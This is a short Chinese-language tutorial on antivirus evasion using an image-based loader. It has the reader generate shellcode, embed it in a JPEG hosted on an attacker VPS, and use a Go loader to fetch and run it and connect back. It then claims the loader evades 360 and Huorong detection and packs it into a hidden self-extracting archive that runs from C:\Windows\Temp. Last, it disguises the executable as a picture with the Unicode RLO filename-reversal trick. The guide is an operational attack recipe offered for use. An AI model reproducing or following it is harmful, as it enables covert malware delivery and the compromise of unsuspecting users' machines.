图片免杀

地址 https://github.com/Hangingsword/HouQing

修改key

生成shellcode

将生成的shellcode放入code.go

写入图片 go run code.go 11.jpeg

将11.jpeg放入vps

执行命令 开启web服务

python -m SimpleHTTPServer 8000

修改loader.go

通过执行  go  run loader.go 执行上线

此时上线成功

执行命令

go build -ldflags="-H windowsgui" Loader.go

编译为exe文件

绕过360 火绒静态动态查杀

 

成功上线

设置自启动压缩文件

 

设置为英文.exe

常规--选择 创建自解压格式压缩文件

选择高级--自解压选项--选择绝对路径  C:\Windows\Temp

选择设置--提取运行

C:\Windows\Temp\Loader.exe

C:\Windows\Temp\11.jpg

选择模式--全部隐藏

选择更新--解压并更新文件--覆盖所有文件

点击后生成gpj.exe

接下来使用文件名反转

在g名称前面右键，选择插入Unicode字符的RLO，修改后为 exe.jpg